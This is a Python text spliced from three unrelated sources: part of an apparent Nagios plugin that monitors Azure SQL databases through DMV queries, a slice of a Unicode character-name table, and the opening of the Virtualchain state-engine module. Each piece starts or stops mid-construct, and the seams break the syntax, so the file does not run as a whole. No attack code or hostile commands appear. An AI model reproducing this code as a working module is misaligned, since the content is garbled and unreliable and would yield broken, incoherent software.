from datetime import timedelta
# Module-level logger; expected to be initialized elsewhere before use.
logger = None
# Total reserved database size in MB (pages are 8 KB each).
DBSIZE_DMV = '''SELECT SUM(reserved_page_count)*8.0/1024 FROM
sys.dm_db_partition_stats;'''
# Per-object reserved size in MB, grouped by object name.
OBJSIZE_DMV = '''SELECT sys.objects.name, SUM(reserved_page_count)
* 8.0 / 1024 FROM sys.dm_db_partition_stats, sys.objects
WHERE sys.dm_db_partition_stats.object_id =
sys.objects.object_id GROUP BY sys.objects.name; '''
# Active connections joined to their sessions: login, last request, CPU time.
DBCONNECTIONS_DMV = '''SELECT e.connection_id, s.session_id, s.login_name,
s.last_request_end_time, s.cpu_time FROM
sys.dm_exec_sessions s INNER JOIN sys.dm_exec_connections e
ON s.session_id = e.session_id;'''
# Top 5 query hashes by average CPU time, with a representative statement text.
TOP5QUERIES_DMV = '''SELECT TOP 5 query_stats.query_hash AS "Query Hash",
SUM(query_stats.total_worker_time) /
SUM(query_stats.execution_count) AS "Avg CPU Time",
MIN(query_stats.statement_text) AS "Statement Text"
FROM
(SELECT QS.*,
SUBSTRING(ST.text, (QS.statement_start_offset/2) + 1,
((CASE statement_end_offset
WHEN -1 THEN DATALENGTH(st.text)
ELSE QS.statement_end_offset END
- QS.statement_start_offset)/2) + 1) AS statement_text
FROM sys.dm_exec_query_stats AS QS
CROSS APPLY sys.dm_exec_sql_text(QS.sql_handle) as ST)
as query_stats
GROUP BY query_stats.query_hash
ORDER BY 2 DESC;'''
# The 50 cached plans with the highest total worker time, plus their SQL text.
QUERYPLAN_DMV = '''SELECT
highest_cpu_queries.plan_handle,
highest_cpu_queries.total_worker_time,
q.dbid,
q.objectid,
q.number,
q.encrypted,
q.[text]
FROM
(SELECT TOP 50
qs.plan_handle,
qs.total_worker_time
FROM
sys.dm_exec_query_stats qs
ORDER BY qs.total_worker_time desc) AS
highest_cpu_queries
CROSS APPLY sys.dm_exec_sql_text(plan_handle) AS q
ORDER BY highest_cpu_queries.total_worker_time desc'''
# Usage views filtered by a timestamp substituted via %s at query time.
BWUSAGE_VIEW = 'select * from sys.bandwidth_usage where time > %s'
DBUSAGE_VIEW = 'select * from sys.database_usage where time > %s'
RESSTAT_VIEW = 'select * from sys.resource_stats where start_time > %s'
RESUSAGE_VIEW = 'select * from sys.resource_usage where time > %s'
# Status of recent asynchronous operations (create/alter/drop).
OPSTATUS_VIEW = '''select resource_type_desc, operation, error_code,
error_desc, error_severity from sys.dm_operation_status'''
# Connection statistics and event log, filtered by start time.
DBCONNECTION_VIEW = '''select * from sys.database_connection_stats
where start_time > %s'''
EVENTLOG_VIEW = 'select * from sys.event_log where start_time > %s'
def is_within_range(nagstring, value):
    """Decide whether value falls inside the alerting range for a Nagios range string
    nagstring -- Nagios warning/critical range specification
    value -- numeric value to compare
    Returns True if the value is within the (alerting) range, else False.
    Raises Exception when the range string is malformed.
    """
    if not nagstring:
        return False
    import re
    first_float = r'(?P<first>(-?[0-9]+(\.[0-9]+)?))'
    second_float = r'(?P<second>(-?[0-9]+(\.[0-9]+)?))'
    # Each supported Nagios range form, paired with the predicate that
    # decides whether the value should trigger an alert for that form.
    forms = (
        (r'^%s$' % first_float,
         lambda m: value > float(m.group('first')) or value < 0),
        (r'^%s:$' % first_float,
         lambda m: value < float(m.group('first'))),
        (r'^~:%s$' % first_float,
         lambda m: value > float(m.group('first'))),
        (r'^%s:%s$' % (first_float, second_float),
         lambda m: value < float(m.group('first'))
                   or value > float(m.group('second'))),
        # '@min:max' inverts the interval: alert when inside it.
        (r'^@%s:%s$' % (first_float, second_float),
         lambda m: float(m.group('first')) <= value <= float(m.group('second'))),
    )
    for pattern, alerts in forms:
        match = re.match(pattern, nagstring)
        if match is not None:
            return alerts(match)
    raise Exception('Improper warning/critical parameter format.')
def nagios_eval(result, warning, critical, nagios_message, unit='',
                verbosity=0):
    """Grade a counter value against the warning and critical Nagios ranges
    result -- counter value
    warning -- nagios warning range string
    critical -- nagios critical range string
    nagios_message -- Nagios message template (expects one %s for the value)
    unit -- unit for the perf counter value
    verbosity -- nagios verbosity value
    Returns (nagios_code, message_text).
    """
    # Critical takes precedence over warning.
    if is_within_range(critical, result):
        code, prefix = 2, 'CRITICAL:'
    elif is_within_range(warning, result):
        code, prefix = 1, 'WARNING:'
    else:
        code, prefix = 0, 'OK:'
    value_text = str(result)
    if verbosity == 0:
        # Terse: only the severity prefix, and only when something is wrong.
        message = prefix if code > 0 else ''
    elif verbosity == 1:
        if code > 0:
            filled = nagios_message % (value_text)
            message = '%s:%s %s' % (prefix, filled, unit or '')
        else:
            message = ''
    else:
        # Verbose: always emit the message, with the configured thresholds.
        filled = nagios_message % (value_text)
        message = '%s%s%s,warning=%s,critical=%s,' % \
            (prefix, filled, unit or '', warning or '', critical or '')
    return code, message
def analyze_dbsize(dbname, counter, row, warning, critical, verbosity):
    """Grade the database size against the warning and critical ranges
    dbname - name of database
    counter - entry in the COUNTERS list
    row - perf data from SQL server as an output of the SQL query/DMV
    warning - warning range argument to the command
    critical - critical range argument to the command
    verbosity - verbose argument to the command.
    """
    size_mb = row[0]
    return nagios_eval(size_mb, warning, critical, 'Size:%s', 'MB', verbosity)
def analyze_objsize(dbname, counter, row, warning, critical, verbosity):
    """Grade one object's size against the warning and critical ranges
    dbname - name of database
    counter - entry in the COUNTERS list
    row - perf data from SQL server as an output of the SQL query/DMV
    warning - warning range argument to the command
    critical - critical range argument to the command
    verbosity - verbose argument to the command.
    """
    # row[0] is the object name, row[1] its reserved size in MB.
    template = 'Object:%s, Size:%%s' % (row[0],)
    return nagios_eval(row[1], warning, critical, template, 'MB', verbosity)
def analyze_conn_info(dbname, counter, row, warning, critical, verbosity):
    """Grade a connection's CPU time against the warning and critical ranges
    dbname - name of database
    counter - entry in the COUNTERS list
    row - perf data from SQL server as an output of the SQL query/DMV
    warning - warning range argument to the command
    critical - critical range argument to the command
    verbosity - verbose argument to the command.
    """
    # row layout per DBCONNECTIONS_DMV: row[2] is login_name, row[4] cpu_time.
    template = 'Database:%s, Login name:%s, CPU time:%%s' % \
        (dbname, row[2],)
    return nagios_eval(row[4], warning, critical, template, 'ms', verbosity)
def analyze_top5_queries(dbname, counter, row, warning, critical, verbosity):
    """Grade a top-5 query's average CPU time against the Nagios ranges
    dbname - name of database
    counter - entry in the COUNTERS list
    row - perf data from SQL server as an output of the SQL query/DMV
    warning - warning range argument to the command
    critical - critical range argument to the command
    verbosity - verbose argument to the command.
    """
    # row layout per TOP5QUERIES_DMV: row[1] avg CPU time, row[2] statement text.
    template = 'Database:%s, query:%s, CPU time:%%s' % (dbname, row[2],)
    return nagios_eval(row[1], warning, critical, template, 'ms', verbosity)
def byte_to_hex(bytestr):
    """ Convert a byte string to its space-separated uppercase hex form. """
    return ' '.join('%02X' % ord(ch) for ch in bytestr)
def analyze_queryplan(dbname, counter, row, warning, critical, verbosity):
    """Grade a query plan's total worker time against the Nagios ranges
    dbname - name of database
    counter - entry in the COUNTERS list
    row - perf data from SQL server as an output of the SQL query/DMV
    warning - warning range argument to the command
    critical - critical range argument to the command
    verbosity - verbose argument to the command.
    """
    # row layout per QUERYPLAN_DMV: row[1] total_worker_time, row[6] SQL text.
    query_text = str(row[6])
    template = 'Database:%s, query:%s, Total worker time:%%s' % \
        (dbname, query_text, )
    return nagios_eval(row[1], warning, critical, template, 'ms', verbosity)
def analyze_bwusage(dbname, counter, row, warning, critical, verbosity):
    """Grade a bandwidth-usage sample against the warning and critical ranges
    dbname - name of database
    counter - entry in the COUNTERS list
    row - perf data from SQL server as an output of the SQL query/DMV
    warning - warning range argument to the command
    critical - critical range argument to the command
    verbosity - verbose argument to the command.
    """
    # NOTE(review): the message uses row[1] as the database name and ignores
    # the dbname argument -- presumably row[1] holds the database column of
    # sys.bandwidth_usage; confirm against the view's schema.
    template = 'Database:%s, Time:%s, direction:%s, class:%s, '\
        'time-period:%s, Size : %%s' % \
        (row[1], str(row[0]), row[2], row[3], row[4],)
    return nagios_eval(row[5], warning, critical, template, 'MB', verbosity)
def analyze_dbusage(dbname, counter, row, warning, critical, verbosity):
"""check query plan CPU usage with warning and critical ranges.
Does not use db size
dbname - name of database
counter - entry in the COUNTERS list
row - perf data from SQL server as an output of the SQL query/DMV
warning - warning range argument to the command
critical - critical range argument to the command
verbosity - verbose argument | |
SYLLABLE MGBI': None,
'VAI SYLLABLE MGBO': None,
'VAI SYLLABLE MGBOO': None,
'VAI SYLLABLE MGBU': None,
'VAI SYLLABLE MI': None,
'VAI SYLLABLE MO': None,
'VAI SYLLABLE MOO': None,
'VAI SYLLABLE MU': None,
'VAI SYLLABLE NA': None,
'VAI SYLLABLE NDA': None,
'VAI SYLLABLE NDE': None,
'VAI SYLLABLE NDEE': None,
'VAI SYLLABLE NDI': None,
'VAI SYLLABLE NDO': None,
'VAI SYLLABLE NDOLE DO': None,
'VAI SYLLABLE NDOLE FA': None,
'VAI SYLLABLE NDOLE KA': None,
'VAI SYLLABLE NDOLE MA': None,
'VAI SYLLABLE NDOLE SOO': None,
'VAI SYLLABLE NDOO': None,
'VAI SYLLABLE NDU': None,
'VAI SYLLABLE NE': None,
'VAI SYLLABLE NEE': None,
'VAI SYLLABLE NG': None,
'VAI SYLLABLE NGAN': None,
'VAI SYLLABLE NGEN': None,
'VAI SYLLABLE NGGA': None,
'VAI SYLLABLE NGGE': None,
'VAI SYLLABLE NGGEE': None,
'VAI SYLLABLE NGGEN': None,
'VAI SYLLABLE NGGI': None,
'VAI SYLLABLE NGGO': None,
'VAI SYLLABLE NGGOO': None,
'VAI SYLLABLE NGGU': None,
'VAI SYLLABLE NGON': None,
'VAI SYLLABLE NI': None,
'VAI SYLLABLE NJA': None,
'VAI SYLLABLE NJE': None,
'VAI SYLLABLE NJEE': None,
'VAI SYLLABLE NJI': None,
'VAI SYLLABLE NJO': None,
'VAI SYLLABLE NJOO': None,
'VAI SYLLABLE NJU': None,
'VAI SYLLABLE NO': None,
'VAI SYLLABLE NOO': None,
'VAI SYLLABLE NU': None,
'VAI SYLLABLE NYA': None,
'VAI SYLLABLE NYE': None,
'VAI SYLLABLE NYEE': None,
'VAI SYLLABLE NYI': None,
'VAI SYLLABLE NYO': None,
'VAI SYLLABLE NYOO': None,
'VAI SYLLABLE NYU': None,
'VAI SYLLABLE O': None,
'VAI SYLLABLE ON': None,
'VAI SYLLABLE OO': None,
'VAI SYLLABLE OON': None,
'VAI SYLLABLE PA': None,
'VAI SYLLABLE PE': None,
'VAI SYLLABLE PEE': None,
'VAI SYLLABLE PI': None,
'VAI SYLLABLE PO': None,
'VAI SYLLABLE POO': None,
'VAI SYLLABLE PU': None,
'VAI SYLLABLE RA': None,
'VAI SYLLABLE RE': None,
'VAI SYLLABLE REE': None,
'VAI SYLLABLE RI': None,
'VAI SYLLABLE RO': None,
'VAI SYLLABLE ROO': None,
'VAI SYLLABLE RU': None,
'VAI SYLLABLE SA': None,
'VAI SYLLABLE SE': None,
'VAI SYLLABLE SEE': None,
'VAI SYLLABLE SHA': None,
'VAI SYLLABLE SHE': None,
'VAI SYLLABLE SHEE': None,
'VAI SYLLABLE SHI': None,
'VAI SYLLABLE SHO': None,
'VAI SYLLABLE SHOO': None,
'VAI SYLLABLE SHU': None,
'VAI SYLLABLE SI': None,
'VAI SYLLABLE SO': None,
'VAI SYLLABLE SOO': None,
'VAI SYLLABLE SU': None,
'VAI SYLLABLE TA': None,
'VAI SYLLABLE TE': None,
'VAI SYLLABLE TEE': None,
'VAI SYLLABLE THA': None,
'VAI SYLLABLE THE': None,
'VAI SYLLABLE THEE': None,
'VAI SYLLABLE THI': None,
'VAI SYLLABLE THO': None,
'VAI SYLLABLE THOO': None,
'VAI SYLLABLE THU': None,
'VAI SYLLABLE TI': None,
'VAI SYLLABLE TO': None,
'VAI SYLLABLE TOO': None,
'VAI SYLLABLE TU': None,
'VAI SYLLABLE U': None,
'VAI SYLLABLE UN': None,
'VAI SYLLABLE VA': None,
'VAI SYLLABLE VE': None,
'VAI SYLLABLE VEE': None,
'VAI SYLLABLE VI': None,
'VAI SYLLABLE VO': None,
'VAI SYLLABLE VOO': None,
'VAI SYLLABLE VU': None,
'VAI SYLLABLE WA': None,
'VAI SYLLABLE WAN': None,
'VAI SYLLABLE WE': None,
'VAI SYLLABLE WEE': None,
'VAI SYLLABLE WEEN': None,
'VAI SYLLABLE WEN': None,
'VAI SYLLABLE WI': None,
'VAI SYLLABLE WIN': None,
'VAI SYLLABLE WO': None,
'VAI SYLLABLE WON': None,
'VAI SYLLABLE WOO': None,
'VAI SYLLABLE WOON': None,
'VAI SYLLABLE WU': None,
'VAI SYLLABLE WUN': None,
'VAI SYLLABLE YA': None,
'VAI SYLLABLE YE': None,
'VAI SYLLABLE YEE': None,
'VAI SYLLABLE YI': None,
'VAI SYLLABLE YO': None,
'VAI SYLLABLE YOO': None,
'VAI SYLLABLE YU': None,
'VAI SYLLABLE ZA': None,
'VAI SYLLABLE ZE': None,
'VAI SYLLABLE ZEE': None,
'VAI SYLLABLE ZHA': None,
'VAI SYLLABLE ZHE': None,
'VAI SYLLABLE ZHEE': None,
'VAI SYLLABLE ZHI': None,
'VAI SYLLABLE ZHO': None,
'VAI SYLLABLE ZHOO': None,
'VAI SYLLABLE ZHU': None,
'VAI SYLLABLE ZI': None,
'VAI SYLLABLE ZO': None,
'VAI SYLLABLE ZOO': None,
'VAI SYLLABLE ZU': None,
'VAI SYMBOL BANG': None,
'VAI SYMBOL DANG': None,
'VAI SYMBOL DO-O': None,
'VAI SYMBOL DOONG': None,
'VAI SYMBOL FAA': None,
'VAI SYMBOL FEENG': None,
'VAI SYMBOL JONG': None,
'VAI SYMBOL KEENG': None,
'VAI SYMBOL KUNG': None,
'VAI SYMBOL NII': None,
'VAI SYMBOL TAA': None,
'VAI SYMBOL TING': None,
'VAI SYMBOL TONG': None,
'VARIATION SELECTOR-100': None,
'VARIATION SELECTOR-101': None,
'VARIATION SELECTOR-102': None,
'VARIATION SELECTOR-103': None,
'VARIATION SELECTOR-104': None,
'VARIATION SELECTOR-105': None,
'VARIATION SELECTOR-106': None,
'VARIATION SELECTOR-107': None,
'VARIATION SELECTOR-108': None,
'VARIATION SELECTOR-109': None,
'VARIATION SELECTOR-110': None,
'VARIATION SELECTOR-111': None,
'VARIATION SELECTOR-112': None,
'VARIATION SELECTOR-113': None,
'VARIATION SELECTOR-114': None,
'VARIATION SELECTOR-115': None,
'VARIATION SELECTOR-116': None,
'VARIATION SELECTOR-117': None,
'VARIATION SELECTOR-118': None,
'VARIATION SELECTOR-119': None,
'VARIATION SELECTOR-120': None,
'VARIATION SELECTOR-121': None,
'VARIATION SELECTOR-122': None,
'VARIATION SELECTOR-123': None,
'VARIATION SELECTOR-124': None,
'VARIATION SELECTOR-125': None,
'VARIATION SELECTOR-126': None,
'VARIATION SELECTOR-127': None,
'VARIATION SELECTOR-128': None,
'VARIATION SELECTOR-129': None,
'VARIATION SELECTOR-130': None,
'VARIATION SELECTOR-131': None,
'VARIATION SELECTOR-132': None,
'VARIATION SELECTOR-133': None,
'VARIATION SELECTOR-134': None,
'VARIATION SELECTOR-135': None,
'VARIATION SELECTOR-136': None,
'VARIATION SELECTOR-137': None,
'VARIATION SELECTOR-138': None,
'VARIATION SELECTOR-139': None,
'VARIATION SELECTOR-140': None,
'VARIATION SELECTOR-141': None,
'VARIATION SELECTOR-142': None,
'VARIATION SELECTOR-143': None,
'VARIATION SELECTOR-144': None,
'VARIATION SELECTOR-145': None,
'VARIATION SELECTOR-146': None,
'VARIATION SELECTOR-147': None,
'VARIATION SELECTOR-148': None,
'VARIATION SELECTOR-149': None,
'VARIATION SELECTOR-150': None,
'VARIATION SELECTOR-151': None,
'VARIATION SELECTOR-152': None,
'VARIATION SELECTOR-153': None,
'VARIATION SELECTOR-154': None,
'VARIATION SELECTOR-155': None,
'VARIATION SELECTOR-156': None,
'VARIATION SELECTOR-157': None,
'VARIATION SELECTOR-158': None,
'VARIATION SELECTOR-159': None,
'VARIATION SELECTOR-160': None,
'VARIATION SELECTOR-161': None,
'VARIATION SELECTOR-162': None,
'VARIATION SELECTOR-163': None,
'VARIATION SELECTOR-164': None,
'VARIATION SELECTOR-165': None,
'VARIATION SELECTOR-166': None,
'VARIATION SELECTOR-167': None,
'VARIATION SELECTOR-168': None,
'VARIATION SELECTOR-169': None,
'VARIATION SELECTOR-17': None,
'VARIATION SELECTOR-170': None,
'VARIATION SELECTOR-171': None,
'VARIATION SELECTOR-172': None,
'VARIATION SELECTOR-173': None,
'VARIATION SELECTOR-174': None,
'VARIATION SELECTOR-175': None,
'VARIATION SELECTOR-176': None,
'VARIATION SELECTOR-177': None,
'VARIATION SELECTOR-178': None,
'VARIATION SELECTOR-179': None,
'VARIATION SELECTOR-18': None,
'VARIATION SELECTOR-180': None,
'VARIATION SELECTOR-181': None,
'VARIATION SELECTOR-182': None,
'VARIATION SELECTOR-183': None,
'VARIATION SELECTOR-184': None,
'VARIATION SELECTOR-185': None,
'VARIATION SELECTOR-186': None,
'VARIATION SELECTOR-187': None,
'VARIATION SELECTOR-188': None,
'VARIATION SELECTOR-189': None,
'VARIATION SELECTOR-19': None,
'VARIATION SELECTOR-190': None,
'VARIATION SELECTOR-191': None,
'VARIATION SELECTOR-192': None,
'VARIATION SELECTOR-193': None,
'VARIATION SELECTOR-194': None,
'VARIATION SELECTOR-195': None,
'VARIATION SELECTOR-196': None,
'VARIATION SELECTOR-197': None,
'VARIATION SELECTOR-198': None,
'VARIATION SELECTOR-199': None,
'VARIATION SELECTOR-20': None,
'VARIATION SELECTOR-200': None,
'VARIATION SELECTOR-201': None,
'VARIATION SELECTOR-202': None,
'VARIATION SELECTOR-203': None,
'VARIATION SELECTOR-204': None,
'VARIATION SELECTOR-205': None,
'VARIATION SELECTOR-206': None,
'VARIATION SELECTOR-207': None,
'VARIATION SELECTOR-208': None,
'VARIATION SELECTOR-209': None,
'VARIATION SELECTOR-21': None,
'VARIATION SELECTOR-210': None,
'VARIATION SELECTOR-211': None,
'VARIATION SELECTOR-212': None,
'VARIATION SELECTOR-213': None,
'VARIATION SELECTOR-214': None,
'VARIATION SELECTOR-215': None,
'VARIATION SELECTOR-216': None,
'VARIATION SELECTOR-217': None,
'VARIATION SELECTOR-218': None,
'VARIATION SELECTOR-219': None,
'VARIATION SELECTOR-22': None,
'VARIATION SELECTOR-220': None,
'VARIATION SELECTOR-221': None,
'VARIATION SELECTOR-222': None,
'VARIATION SELECTOR-223': None,
'VARIATION SELECTOR-224': None,
'VARIATION SELECTOR-225': None,
'VARIATION SELECTOR-226': None,
'VARIATION SELECTOR-227': None,
'VARIATION SELECTOR-228': None,
'VARIATION SELECTOR-229': None,
'VARIATION SELECTOR-23': None,
'VARIATION SELECTOR-230': None,
'VARIATION SELECTOR-231': None,
'VARIATION SELECTOR-232': None,
'VARIATION SELECTOR-233': None,
'VARIATION SELECTOR-234': None,
'VARIATION SELECTOR-235': None,
'VARIATION SELECTOR-236': None,
'VARIATION SELECTOR-237': None,
'VARIATION SELECTOR-238': None,
'VARIATION SELECTOR-239': None,
'VARIATION SELECTOR-24': None,
'VARIATION SELECTOR-240': None,
'VARIATION SELECTOR-241': None,
'VARIATION SELECTOR-242': None,
'VARIATION SELECTOR-243': None,
'VARIATION SELECTOR-244': None,
'VARIATION SELECTOR-245': None,
'VARIATION SELECTOR-246': None,
'VARIATION SELECTOR-247': None,
'VARIATION SELECTOR-248': None,
'VARIATION SELECTOR-249': None,
'VARIATION SELECTOR-25': None,
'VARIATION SELECTOR-250': None,
'VARIATION SELECTOR-251': None,
'VARIATION SELECTOR-252': None,
'VARIATION SELECTOR-253': None,
'VARIATION SELECTOR-254': None,
'VARIATION SELECTOR-255': None,
'VARIATION SELECTOR-256': None,
'VARIATION SELECTOR-26': None,
'VARIATION SELECTOR-27': None,
'VARIATION SELECTOR-28': None,
'VARIATION SELECTOR-29': None,
'VARIATION SELECTOR-30': None,
'VARIATION SELECTOR-31': None,
'VARIATION SELECTOR-32': None,
'VARIATION SELECTOR-33': None,
'VARIATION SELECTOR-34': None,
'VARIATION SELECTOR-35': None,
'VARIATION SELECTOR-36': None,
'VARIATION SELECTOR-37': None,
'VARIATION SELECTOR-38': None,
'VARIATION SELECTOR-39': None,
'VARIATION SELECTOR-40': None,
'VARIATION SELECTOR-41': None,
'VARIATION SELECTOR-42': None,
'VARIATION SELECTOR-43': None,
'VARIATION SELECTOR-44': None,
'VARIATION SELECTOR-45': None,
'VARIATION SELECTOR-46': None,
'VARIATION SELECTOR-47': None,
'VARIATION SELECTOR-48': None,
'VARIATION SELECTOR-49': None,
'VARIATION SELECTOR-50': None,
'VARIATION SELECTOR-51': None,
'VARIATION SELECTOR-52': None,
'VARIATION SELECTOR-53': None,
'VARIATION SELECTOR-54': None,
'VARIATION SELECTOR-55': None,
'VARIATION SELECTOR-56': None,
'VARIATION SELECTOR-57': None,
'VARIATION SELECTOR-58': None,
'VARIATION SELECTOR-59': None,
'VARIATION SELECTOR-60': None,
'VARIATION SELECTOR-61': None,
'VARIATION SELECTOR-62': None,
'VARIATION SELECTOR-63': None,
'VARIATION SELECTOR-64': None,
'VARIATION SELECTOR-65': None,
'VARIATION SELECTOR-66': None,
'VARIATION SELECTOR-67': None,
'VARIATION SELECTOR-68': None,
'VARIATION SELECTOR-69': None,
'VARIATION SELECTOR-70': None,
'VARIATION SELECTOR-71': None,
'VARIATION SELECTOR-72': None,
'VARIATION SELECTOR-73': None,
'VARIATION SELECTOR-74': None,
'VARIATION SELECTOR-75': None,
'VARIATION SELECTOR-76': None,
'VARIATION SELECTOR-77': None,
'VARIATION SELECTOR-78': None,
'VARIATION SELECTOR-79': None,
'VARIATION SELECTOR-80': None,
'VARIATION SELECTOR-81': None,
'VARIATION SELECTOR-82': None,
'VARIATION SELECTOR-83': None,
'VARIATION SELECTOR-84': None,
'VARIATION SELECTOR-85': None,
'VARIATION SELECTOR-86': None,
'VARIATION SELECTOR-87': None,
'VARIATION SELECTOR-88': None,
'VARIATION SELECTOR-89': None,
'VARIATION SELECTOR-90': None,
'VARIATION SELECTOR-91': None,
'VARIATION SELECTOR-92': None,
'VARIATION SELECTOR-93': None,
'VARIATION SELECTOR-94': None,
'VARIATION SELECTOR-95': None,
'VARIATION SELECTOR-96': None,
'VARIATION SELECTOR-97': None,
'VARIATION SELECTOR-98': None,
'VARIATION SELECTOR-99': None,
'VEDIC SIGN ANUSVARA ANTARGOMUKHA': None,
'VEDIC SIGN ANUSVARA BAHIRGOMUKHA': None,
'VEDIC SIGN ANUSVARA UBHAYATO MUKHA': None,
'VEDIC SIGN ANUSVARA VAMAGOMUKHA': None,
'VEDIC SIGN ANUSVARA VAMAGOMUKHA WITH TAIL': None,
'VEDIC SIGN ARDHAVISARGA': None,
'VEDIC SIGN HEXIFORM LONG ANUSVARA': None,
'VEDIC SIGN LONG ANUSVARA': None,
'VEDIC SIGN NIHSHVASA': None,
'VEDIC SIGN REVERSED VISARGA ANUDATTA': None,
'VEDIC SIGN REVERSED VISARGA UDATTA': None,
'VEDIC SIGN RTHANG LONG ANUSVARA': None,
'VEDIC SIGN TIRYAK': None,
'VEDIC SIGN VISARGA ANUDATTA': None,
'VEDIC SIGN VISARGA ANUDATTA WITH TAIL': None,
'VEDIC SIGN VISARGA SVARITA': None,
'VEDIC SIGN VISARGA UDATTA': None,
'VEDIC SIGN VISARGA UDATTA WITH TAIL': None,
'VEDIC SIGN YAJURVEDIC MIDLINE SVARITA': None,
'VEDIC TONE ATHARVAVEDIC INDEPENDENT SVARITA': None,
'VEDIC TONE CANDRA BELOW': None,
'VEDIC TONE DOT BELOW': None,
'VEDIC TONE DOUBLE SVARITA': None,
'VEDIC TONE KARSHANA': None,
'VEDIC TONE KATHAKA ANUDATTA': None,
'VEDIC TONE PRENKHA': None,
'VEDIC TONE RIGVEDIC KASHMIRI INDEPENDENT SVARITA': None,
'VEDIC TONE SHARA': None,
'VEDIC TONE THREE DOTS BELOW': None,
'VEDIC TONE TRIPLE SVARITA': None,
'VEDIC TONE TWO DOTS BELOW': None,
'VEDIC TONE YAJURVEDIC AGGRAVATED INDEPENDENT SVARITA': None,
'VEDIC TONE YAJURVEDIC INDEPENDENT SVARITA': None,
'VEDIC TONE YAJURVEDIC KATHAKA INDEPENDENT SVARITA': None,
'VEDIC TONE YAJURVEDIC KATHAKA INDEPENDENT SVARITA SCHROEDER': None,
'VERTICAL BAR WITH HORIZONTAL STROKE': None,
'VERTICAL FOUR DOTS': None,
'VERTICAL LINE EXTENSION': None,
'VERTICAL MALE WITH STROKE SIGN': None,
'VERTICAL TILDE': None,
'VESTA': None,
'VULGAR FRACTION ONE NINTH': None,
'VULGAR FRACTION ONE SEVENTH': None,
'VULGAR FRACTION ONE TENTH': None,
'VULGAR FRACTION ZERO THIRDS': None,
'WARNING SIGN': None,
'WAVE ARROW POINTING DIRECTLY LEFT': None,
'WHEELCHAIR SYMBOL': None,
'WHITE DIAMOND IN SQUARE': None,
'WHITE DRAUGHTS KING': None,
'WHITE DRAUGHTS MAN': None,
'WHITE FLAG': None,
'WHITE FLAG WITH HORIZONTAL MIDDLE BLACK STRIPE': None,
'WHITE HEXAGON': None,
'WHITE HORIZONTAL ELLIPSE': None,
'WHITE LARGE SQUARE': None,
'WHITE LEFT LANE MERGE': None,
'WHITE MEDIUM DIAMOND': None,
'WHITE MEDIUM LOZENGE': None,
'WHITE MEDIUM STAR': None,
'WHITE PENTAGON': None,
'WHITE RIGHT-POINTING PENTAGON': None,
'WHITE SMALL LOZENGE': None,
'WHITE SMALL STAR': None,
'WHITE TRAPEZIUM': None,
'WHITE TRIANGLE CONTAINING SMALL WHITE TRIANGLE': None,
'WHITE TWO-WAY LEFT WAY TRAFFIC': None,
'WHITE VERTICAL ELLIPSE': None,
'WHITE VERY SMALL SQUARE': None,
'WORD SEPARATOR MIDDLE DOT': None,
'YI SYLLABLE ITERATION MARK': None,
}
# Name prefix shared by all algorithmically-named CJK unified ideographs.
_cjk_prefix = "CJK UNIFIED IDEOGRAPH-"
# Hangul syllable names are built from this prefix plus jamo name parts.
_hangul_prefix = 'HANGUL SYLLABLE '
# Leading-consonant (choseong) name parts, in Unicode algorithmic order.
_hangul_L = ['G', 'GG', 'N', 'D', 'DD', 'R', 'M', 'B', 'BB',
'S', 'SS', '', 'J', 'JJ', 'C', 'K', 'T', 'P', 'H']
_hangul_V = ['A', 'AE', 'YA', 'YAE', 'EO', 'E', 'YEO', 'YE', 'O', 'WA', 'WAE',
'OE', 'YO', 'U', 'WEO', 'WE', | |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Virtualchain
~~~~~
copyright: (c) 2014-2015 by Halfmoon Labs, Inc.
copyright: (c) 2016 by Blockstack.org
This file is part of Virtualchain
Virtualchain is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
Virtualchain is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with Virtualchain. If not, see <http://www.gnu.org/licenses/>.
"""
import argparse
import logging
import os
import os.path
import sys
import subprocess
import signal
import json
import datetime
import httplib
import ssl
import threading
import time
import socket
import binascii
import pybitcoin
import copy
import shutil
import time
import traceback
import cPickle as pickle
import imp
import simplejson
from collections import defaultdict
import config
import blockchain.transactions as transactions
import blockchain.session as session
from utilitybelt import is_hex
# Package-level logger for virtualchain.
log = session.get_logger("virtualchain")
# Field names that virtualchain itself injects into parsed operation
# records; implementations must not reuse these names for their own fields.
RESERVED_KEYS = [
'virtualchain_opcode',
'virtualchain_outputs',
'virtualchain_senders',
'virtualchain_fee',
'virtualchain_block_number',
'virtualchain_accepted',
'virtualchain_txid',
'virtualchain_txindex'
]
class StateEngine( object ):
"""
Client to the virtual chain's database of operations, constructed and
kept synchronized with records in the underlying blockchain. If the blockchain
is the ledger of all operations to have ever been committed
(including invalid and fraudulent ones), then the virtual chain is the sequence
of operations that we're interested in, and the state engine is the logic
for finding and processing the subsequence of these that are "valid."
The purpose of the state engine is to process records from the blockchain in order
to carry out its application's core business logic. This usually means building up a
database over the set of virtual chain records. Virtual chain data are
encoded in transactions data within the underlying cryptocurrency (i.e. OP_RETURNs in Bitcoin).
Each block in the blockchain must be fed into the database, and the blocks'
operations extracted, validated, and accounted for. As such, at block N,
the state engine would have a database that represents its current state at block N.
Because the underlying cryptocurrency blockchain can fork, state engine peers need to
determine that they are on the same fork so they will know which virtual chain operations
to process. To do so, the state engine calculates a Merkle tree over the operations processed
from the current block, as well as the root of the previous such tree for the previous block,
and encodes the root hash in each operation. Then, one peer can tell that the other peer's operations
were calculated on the same blockchain fork simply by ensuring that the operation had
the right Merkle root hash for that block. These Merkle root hashes are called
"consensus hashes."
Processing a block happens in seven stages: "parse", "check", "log", "commit", "serialize", "snapshot", and "save"
* "Parsing" a block transaction's nulldata (i.e. from an OP_RETURN) means translating
the OP_RETURN data into a virtual chain operation.
* "Checking" an operation means ensuring the operation is valid.
* "Logging" an operation means staging an operation to be fed into the state engine.
* "Committing" an operation means feeding it into the state engine.
* "Serializing" an operation means turning it into a byte string, in preparation for snapshotting.
* "Snapshotting" means calculating the consensus hash of the state engine, at block N.
* "Saving" means writing the new state to persistent storage.
Blocks are processed in order, and transactions within a block are processed in the order in which
they appear in it.
"""
def __init__(self, magic_bytes, opcodes, opfields, impl=None, state=None, initial_snapshots=None, expected_snapshots=None, backup_frequency=None, backup_max_age=None, read_only=False ):
    """
    Construct a state engine client, optionally from locally-cached
    state and the set of previously-calculated consensus
